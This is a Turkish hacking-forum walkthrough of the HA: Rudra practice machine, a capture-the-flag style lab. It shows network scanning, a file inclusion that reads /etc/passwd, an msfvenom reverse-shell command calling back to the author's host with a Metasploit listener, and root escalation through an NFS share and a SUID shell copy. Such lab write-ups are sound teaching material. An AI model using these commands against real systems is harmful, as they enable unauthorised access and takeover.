HA: Rudra Zafiyetli Makine Çözümü // Qwx

Qwx

Kıdemli Üye
30 Nis 2012
2,728
13
HA: Rudra Zafiyetli Makinesi Çözümü

Merhaba, değerli TürkHackTeam üyeleri bu konumuzda HA: Rudra adlı zafiyetli makinenin çözümünü yapacağız. Bir önceki zafiyetli makine çözümüm olan Misdirection: 1 konusuna ilgili linkten gidebilirsiniz; TIKLA

HA: Rudra

İsim: HA: Rudra
Çıkış Tarihi: 22 Ekim 2019
Yazar: Hacking Articles
Seri: HA
Dosya boyutu: 685 MB (zip)
İşletim sistemi: Ubuntu


İlk önce indirmiş olduğumuz zafiyetli makinenin zip dosyasından çıkartıkan sonra açılımını gerçekleştiriyoruz. Makinemizin açılış görüntüsü şu şekildedir.

acilis.jpg


Makinemizi açtıktan sonra terminal ekranımıza netdiscover komutunu yazarak makinenin IP Adresini öğreniyoruz.

netdiscover.jpg


IP Adresini öğrendikten sonra Nmap aracı ile portların taranmasını sağlayıp açık olanları görüntüleyeceğiz. Terminal için komutumuz nmap -sV <ipadress>

nmap.jpg


80 numaralı portumuz açık olduğu için ilgili web sitesini ziyaret ediyoruz. Birçok görselin bulunduğu bir web sitesi ile karşılaşıyoruz.

site.jpg


Ardından robots.txt'nin varlığını kontrol ettiğimizde nandi.php yazısını görmekteyiz. Bizlere verilen bu uzantıyı ziyaret edelim.

robots.jpg


nandi.php'yi ziyaret ettiğimizde boş bir sayfa ile karşılaşıyoruz. .php uzantısına sahip olduğu için sayfada kod yürütme güvenlik açığının olup olmadığını kontrol ettiğimizde file parametresinin çalışıyor olduğunu görebiliyoruz. Bunun için ise ?file=/etc/passwd komutunu ekleyip çalıştırdığımız zaman bizlere çıktısını vermektedir.

passwd.jpg


Ardından showmount -e <ipadress> komutu ile NFS'ye bağlı bulunan dosya sistemlerini görüntülüyoruz ve bizlerin oluşturduğu /tmp/rudra dizinine ilgili dosyaları çıkartıyoruz. Dosya içeriğine baktığımızda mahadev.txt adlı bir yazı dosyası çıkmaktadır burada Rudra hakkında kısa bir bilgi içermektedir.

mount.jpg


Şimdi ise msfvenom ile bir shell oluşturacağız. Oluşturma işlemine başlamadan önce IP Adresinizi öğrenmek için ifconfig komutunu kullanabilirisiniz. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.4 LPORT=1234 -f raw > shell.php komutu ile shell oluşturma işlemini tamamlıyoruz.

shell.jpg


Sıra bu oluşturduğumuz shell'i çalıştırdığımız zaman dinleme işlemini gerçekleştireceğimiz Métasploit aracımızı açmaya geldi. Terminalimize msfconsole komutunu giriyoruz. Métasploit aracımız açıldığı zaman use exploit/multi/handler ardından set payload php/meterpreter_reverse_tcp komutlarını girip LHOST ve LPORT girdilerini verdiğimiz zaman exploit diyerek çalıştırıyoruz.

msf.jpg


Tekrardan tarayıcımızı açıyoruz ve bu sefer kod yürütme kısmına /home/shivay/shell.php girdisini veriyoruz. Bizim oluşturduğumuz shell'i çalıştırdığımız anda Métasploit aracımızdan bir session yakalamaktadır işlem başarılı bir şekilde sonuçlanmıştır.

basarili.jpg


Giriş yaptığımızda www-data kullanıcı olduğumuzu görmekteyiz. Root kullanıcısı olmak için uzun bir uğraştan sonra kendi makinemizden /bin/sh dosyasını zafiyetli makinemizin /home/shivay/ bölümüne kopyalıyoruz ve SUID bitini etkinleştiriyoruz.

sh.jpg


Ardından zafiyetli makinemize geçip ./sh -p komutu ile çalıştırıyoruz ve root kullanıcısına yükseliyoruz. Şimdi yapmamız gerekenler sadece /root dizinine girip flag'imizi okumak olacaktır.

root.jpg


cat final.txt ile de flagımızı okuyup zafiyetli makine çözümüzü tamamlıyoruz.

flag.jpg

 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.